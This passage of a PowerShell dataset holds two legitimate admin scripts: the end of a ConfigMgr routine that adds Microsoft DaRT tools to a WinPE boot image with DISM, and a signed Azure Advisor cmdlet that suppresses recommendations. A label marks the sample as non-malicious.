[parameter(Mandatory=$true, HelpMessage="Specify the file name or path of the executable to be invoked, including the extension")]
[ValidateNotNullOrEmpty()]
[string]$FilePath,
[parameter(Mandatory=$false, HelpMessage="Specify arguments that will be passed to the executable")]
[ValidateNotNull()]
[string]$Arguments
)
$SplatArgs = @{
FilePath = $FilePath
NoNewWindow = $true
Passthru = $true
ErrorAction = "Stop"
}
if (-not([System.String]::IsNullOrEmpty($Arguments))) {
$SplatArgs.Add("ArgumentList", $Arguments)
}
try {
$Invocation = Start-Process @SplatArgs
$Handle = $Invocation.Handle
$Invocation.WaitForExit()
}
catch [System.Exception] {
Write-Warning -Message $_.Exception.Message ; break
}
return $Invocation.ExitCode
}
try {
Write-Verbose -Message "Attempting to locate Boot Image with PackageID: $($PackageID)"
$BootImagePackage = Get-WmiObject -Namespace "root\SMS\site_$($SiteCode)" -Class SMS_BootImagePackage -ComputerName $SiteServer -Filter "PackageID = '$($PackageID)'" -ErrorAction Stop
if ($BootImagePackage -ne $null) {
Write-Verbose -Message "Successfully located Boot Image with PackageID: $($PackageID)"
$BootImagePath = $BootImagePackage.ImagePath
Write-Verbose -Message "Current image path: $($BootImagePath)"
switch ($BootImagePackage.Architecture) {
9 {
$FileName = "Toolsx64.cab"
}
0 {
$FileName = "Toolsx86.cab"
}
}
try {
$CurrentBootImageLocation = Split-Path -Path $BootImagePath -Parent
$CurrentBootImageFileName = Split-Path -Path $BootImagePath -Leaf
$BackupFileName = -join($CurrentBootImageFileName, ".", (Get-Date -format "yyyyMMdd"), ".bak")
Copy-Item -Path $BootImagePath -Destination (Join-Path -Path $CurrentBootImageLocation -ChildPath $BackupFileName) -Force -ErrorAction Stop -Verbose:$false
Write-Verbose -Message "Successfully backed up existing Boot Image baseline file"
if (-not(Test-Path -Path $MountPath -PathType Container)) {
try {
New-Item -Path $MountPath -ItemType Directory -Force -ErrorAction Stop | Out-Null
}
catch [System.Exception] {
Write-Warning -Message "An error occurred while creating the mount folder. Error message: $($_.Exception.Message)" ; break
}
}
try {
Write-Verbose -Message "Attempting to mount '$($BootImagePackage.Name)' from: $($BootImagePath)"
$ReturnValue = Invoke-Executable -FilePath $DeploymentToolsDISMPath -Arguments "/Mount-Image /ImageFile:""$($BootImagePath)"" /Index:1 /MountDir:""$($MountPath)"""
if ($ReturnValue -eq 0) {
Write-Verbose -Message "Successfully mounted '$($BootImagePackage.Name)'"
try {
$DaRTComponent = Join-Path -Path $DaRTInstallPath -ChildPath $FileName
Write-Verbose -Message "Path to DaRT component to be injected: $($DaRTComponent)"
if (Test-Path -Path $DaRTComponent) {
Write-Verbose -Message "Attempting to inject DaRT component into Boot Image mount location: $($MountPath)"
$ExpandComponent = Invoke-Executable -FilePath "expand.exe" -Arguments """$($DaRTComponent)"" -F:*.* ""$($MountPath)"""
if ($ExpandComponent -eq 0) {
Write-Verbose -Message "Successfully injected DaRT component into mounted Boot Image"
}
else {
Write-Warning -Message "An error occurred while expanding DaRT components into mounted Boot Image. Exit code: $($ExpandComponent)"
}
}
else {
Write-Warning -Message "Unable to locate DaRT component cabinet file"; break
}
}
catch [System.Exception] {
Write-Warning -Message "An error occurred while injecting DaRT component for Boot Image: $($BootImagePath). Error message: $($_.Exception.Message)"
}
try {
Write-Verbose -Message "Attempting to copy DartConfig.dat into Boot Image mount location: $($MountPath)"
Copy-Item -Path (Join-Path -Path $MDTInstallPath -ChildPath "\Templates\DartConfig8.dat") -Destination (Join-Path -Path $MountPath -ChildPath "\Windows\System32\DartConfig.dat") -ErrorAction Stop
Write-Verbose -Message "Succssfully copied DartConfig.dat into Boot Image mount location"
}
catch [System.Exception] {
Write-Warning -Message "An error occurred while injecting optional component for Boot Image: $($BootImagePath). Error message: $($_.Exception.Message)"
}
Write-Verbose -Message "Attempting to dismount '$($BootImagePackage.Name)' from: $($MountPath)"
$ReturnValue = Invoke-Executable -FilePath $DeploymentToolsDISMPath -Arguments "/Unmount-Image /MountDir:""$($MountPath)"" /Commit"
if ($ReturnValue -eq 0) {
Write-Verbose -Message "Successfully dismounted the Boot Image from mount directory"
}
if ($PSBoundParameters["UpdatePackage"]) {
Write-Verbose -Message "Attempting to refresh the Boot Image package, this operation will take some time"
$BootImagePackage.Get()
$InvocationUpdatePackage = $BootImagePackage.RefreshPkgSource()
if ($InvocationUpdatePackage.ReturnValue -eq 0) {
Write-Verbose -Message "Successfully refreshed the Boot Image package"
}
}
}
else {
Write-Warning -Message "Failed to mount the Boot Image"
}
}
catch {
Write-Warning -Message "An error occured while attempting to mount the Boot Image. Error message: $($_.Exception.Message)"
}
}
catch [System.Exception] {
Write-Warning -Message "An error occurred while backing up Boot Image baseline file. Error message: $($_.Exception.Message)"
}
}
else {
Write-Verbose -Message "Unable to locate a Boot Image with given PackageID, please enter a valid PackageID as identification of an existing Boot Image"
}
}
catch [System.UnauthorizedAccessException] {
Write-Warning -Message "An unauthorized access exception occurred. Error message: $($_.Exception.Message)"
}
catch {
Write-Warning -Message "An error occurred. Error message: $($_.Exception.Message)"
}
}
|
combined_dataset/train/non-malicious/sample_45_65.ps1
|
sample_45_65.ps1
|
# ----------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code
# is regenerated.
# ----------------------------------------------------------------------------------
<#
.Synopsis
Disable an Azure Advisor recommendation.
.Description
Disable an Azure Advisor recommendation.
.Link
https://learn.microsoft.com/powershell/module/az.advisor/Disable-AzAdvisorRecommendation
#>
function Disable-AzAdvisorRecommendation{
[OutputType([Microsoft.Azure.PowerShell.Cmdlets.Advisor.Models.Api202001.IResourceRecommendationBase])]
[CmdletBinding(DefaultParameterSetName='IdParameterSet', SupportsShouldProcess, PositionalBinding=$false)]
param(
[Parameter(ParameterSetName='IdParameterSet', Mandatory, HelpMessage='Id of the recommendation to be suppressed.')]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Path')]
[System.String]
${ResourceId},
[Parameter(ParameterSetName='NameParameterSet', Mandatory, HelpMessage='ResourceName of the recommendation.')]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Path')]
[System.String]
${RecommendationName},
[Parameter(ParameterSetName='InputObjectParameterSet', Mandatory, ValueFromPipeline, HelpMessage='The powershell object type PsAzureAdvisorResourceRecommendationBase returned by Get-AzAdvisorRecommendation call.')]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Models.IAdvisorIdentity]
${InputObject},
[Parameter(ParameterSetName='InputObjectParameterSet', HelpMessage="Days to disable.")]
[Parameter(ParameterSetName='IdParameterSet', HelpMessage="Days to disable.")]
[Parameter(ParameterSetName='NameParameterSet', HelpMessage="Days to disable.")]
${Day},
[Parameter(ParameterSetName='InputObjectParameterSet')]
[Parameter(ParameterSetName='IdParameterSet')]
[Parameter(ParameterSetName='NameParameterSet')]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')]
[System.String[]]
# The Azure subscription ID.
${SubscriptionId},
[Parameter()]
[Alias('AzureRMContext', 'AzureCredential')]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Azure')]
[System.Management.Automation.PSObject]
# The credentials, account, tenant, and subscription used for communication with Azure.
${DefaultProfile},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Wait for .NET debugger to attach
${Break},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be appended to the front of the pipeline
${HttpPipelineAppend},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be prepended to the front of the pipeline
${HttpPipelinePrepend},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Runtime')]
[System.Uri]
# The URI for the proxy server to use
${Proxy},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Runtime')]
[System.Management.Automation.PSCredential]
# Credentials for a proxy server to use for the remote call
${ProxyCredential},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Advisor.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Use the default credentials for the proxy
${ProxyUseDefaultCredentials}
)
process{
$DefaultSuppressionName = "HardcodedSuppressionName"
if ($PSBoundParameters.ContainsKey("RecommendationName"))
{
$null = $PSBoundParameters.Remove("RecommendationName")
}
if ($PSBoundParameters.ContainsKey("ResourceId"))
{
$null = $PSBoundParameters.Remove("ResourceId")
}
if ($PSBoundParameters.ContainsKey("InputObject"))
{
$null = $PSBoundParameters.Remove("InputObject")
}
if ($PSBoundParameters.ContainsKey("Day"))
{
$null = $PSBoundParameters.Remove("Day")
}
if ($PSBoundParameters.ContainsKey("SubscriptionId"))
{
$null = $PSBoundParameters.Remove("SubscriptionId")
}
switch ($PSCmdlet.ParameterSetName) {
'NameParameterSet' {
$ResourceUri = "subscriptions/" + $SubscriptionId
$Recommendation= Az.Advisor.internal\Get-AzAdvisorRecommendation -ResourceUri $ResourceUri -Id $RecommendationName @PSBoundParameters
$ResourceId = $Recommendation.Id
break
}
'InputObjectParameterSet' {
$ResourceId = $InputObject.Id
break
}
}
if ($ResourceId.Contains("providers/Microsoft.Advisor")){
$EndIndex = $ResourceId.IndexOf("providers/Microsoft.Advisor") - 2
$ResourceUri= $ResourceId.Substring(1, $EndIndex)
}
$ResourceIdSplit = $ResourceId.Split('/')
if ($ResourceIdSplit[$ResourceIdSplit.Length - 2].Equals("recommendations"))
{
$RecommendationId = $ResourceIdSplit[$ResourceIdSplit.Length - 1]
}
if (!$Day) {$Ttl = ""}
else
{$Ttl = (New-Timespan -Days $Day).ToString("dd\:hh\:mm\:ss")}
Az.Advisor.internal\New-AzAdvisorSuppression -Name $DefaultSuppressionName -RecommendationId $RecommendationId -ResourceUri $ResourceUri -Ttl $Ttl @PSBoundParameters
}
}
# SIG # Begin signature block
# MIInzgYJKoZIhvcNAQcCoIInvzCCJ7sCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCD+hG0J5zpiixi1
# hygqfYX7Xr+aK2MDfvhaixjOCxmD1KCCDYUwggYDMIID66ADAgECAhMzAAADri01
# UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG
# yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899
# QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82
# 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV
# M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd
# WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
# AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W
# 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY
# 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV
# APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37
# ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57
# xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t
# Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i
# 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk
# 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK
# 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO
# zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA
# A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIPvm
# LVs31zQ2hgYkRMkdOKuQQpeehOfPy60c5cuwhMlUMEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEA3ByOV2ZVOrkXt7ob7nTzJ+znQiuHRsoSgZ2q
# P466Sh9Vh31ik+S7s29Ai5+ETOIvR/X8CHVIpM8O6t1OtfjyD/n1zWN4vpJuWA2+
# SobdE5VnQucWWeGomuuCCkD9BxE4Nctr3E01gWRXVDIno4NdPESf/uuEwTIPQMbZ
# mab9OoblGGyCm2buxsPCoeUHF1v10bE2XWyNJLLFW3mrl25dFQrJHAtpAC9rsbn6
# wQzDx+9J8OyX5MYngAr7SNaRfN9b5VWHrGPhZPpD0Oe2iwrR4U1uLmRHYUnSrYny
# gRnqGmMgV90V6Z1xLTi+jmbDlfpLhS+7lhmq9FSfYrrD2U1hj6GCFykwghclBgor
# BgEEAYI3AwMBMYIXFTCCFxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCAcrR1/rLoTmsexPdygb4subkRNMf0I45nx
# 71pt96f0GQIGZiAsyECoGBMyMDI0MDQyMzEzMTUyMS43NDhaMASAAgH0oIHYpIHV
# MIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL
# EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsT
# HVRoYWxlcyBUU1MgRVNOOkQwODItNEJGRC1FRUJBMSUwIwYDVQQDExxNaWNyb3Nv
# ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHcweCM
# wl9YXo4AAQAAAdwwDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg
# UENBIDIwMTAwHhcNMjMxMDEyMTkwNzA2WhcNMjUwMTEwMTkwNzA2WjCB0jELMAkG
# A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx
# HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z
# b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMg
# VFNTIEVTTjpEMDgyLTRCRkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUt
# U3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIvI
# syA1sjg9kSKJzelrUWF5ShqYWL83amn3SE5JyIVPUC7F6qTcLphhHZ9idf21f0Ra
# GrU8EHydF8NxPMR2KVNiAtCGPJa8kV1CGvn3beGB2m2ltmqJanG71mAywrkKATYn
# iwKLPQLJ00EkXw5TSwfmJXbdgQLFlHyfA5Kg+pUsJXzqumkIvEr0DXPvptAGqkdF
# LKwo4BTlEgnvzeTfXukzX8vQtTALfVJuTUgRU7zoP/RFWt3WagahZ6UloI0FC8Xl
# BQDVDX5JeMEsx7jgJDdEnK44Y8gHuEWRDq+SG9Xo0GIOjiuTWD5uv3vlEmIAyR/7
# rSFvcLnwAqMdqcy/iqQPMlDOcd0AbniP8ia1BQEUnfZT3UxyK9rLB/SRiKPyHDlg
# 8oWwXyiv3+bGB6dmdM61ur6nUtfDf51lPcKhK4Vo83pOE1/niWlVnEHQV9NJ5/Db
# USqW2RqTUa2O2KuvsyRGMEgjGJA12/SqrRqlvE2fiN5ZmZVtqSPWaIasx7a0GB+f
# dTw+geRn6Mo2S6+/bZEwS/0IJ5gcKGinNbfyQ1xrvWXPtXzKOfjkh75iRuXourGV
# PRqkmz5UYz+R5ybMJWj+mfcGqz2hXV8iZnCZDBrrnZivnErCMh5Flfg8496pT0ph
# jUTH2GChHIvE4SDSk2hwWP/uHB9gEs8p/9Pe/mt9AgMBAAGjggFJMIIBRTAdBgNV
# HQ4EFgQU6HPSBd0OfEX3uNWsdkSraUGe3dswHwYDVR0jBBgwFoAUn6cVXQBeYl2D
# 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3Nv
# ZnQuY29tL3BraW9wcy9jcmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy
# MDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1l
# LVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUB
# Af8EDDAKBggrBgEFBQcDCDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQAD
# ggIBANnrb8Ewr8eX/H1sKt3rnwTDx4AqgHbkMNQo+kUGwCINXS3y1GUcdqsK/R1g
# 6Tf7tNx1q0NpKk1JTupUJfHdExKtkuhHA+82lT7yISp/Y74dqJ03RCT4Q+8ooQXT
# MzxiewfErVLt8WefebncST0i6ypKv87pCYkxM24bbqbM/V+M5VBppCUs7R+cETiz
# /zEA1AbZL/viXtHmryA0CGd+Pt9c+adsYfm7qe5UMnS0f/YJmEEMkEqGXCzyLK+d
# h+UsFi0d4lkdcE+Zq5JNjIHesX1wztGVAtvX0DYDZdN2WZ1kk+hOMblUV/L8n1YW
# zhP/5XQnYl03AfXErn+1Eatylifzd3ChJ1xuGG76YbWgiRXnDvCiwDqvUJevVRY1
# qy4y4vlVKaShtbdfgPyGeeJ/YcSBONOc0DNTWbjMbL50qeIEC0lHSpL2rRYNVu3h
# sHzG8n5u5CQajPwx9PzpsZIeFTNHyVF6kujI4Vo9NvO/zF8Ot44IMj4M7UX9Za4Q
# wGf5B71x57OjaX53gxT4vzoHvEBXF9qCmHRgXBLbRomJfDn60alzv7dpCVQIuQ06
# 2nyIZKnsXxzuKFb0TjXWw6OFpG1bsjXpOo5DMHkysribxHor4Yz5dZjVyHANyKo0
# bSrAlVeihcaG5F74SZT8FtyHAW6IgLc5w/3D+R1obDhKZ21WMIIHcTCCBVmgAwIB
# AgITMwAAABXF52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UE
# BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
# BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0
# IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1
# WhcNMzAwOTMwMTgzMjI1WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu
# Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv
# cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCC
# AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O
# 1YLT/e6cBwfSqWxOdcjKNVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZn
# hUYjDLWNE893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t
# 1w/YJlN8OWECesSq/XJprx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxq
# D89d9P6OU8/W7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmP
# frVUj9z6BVWYbWg7mka97aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSW
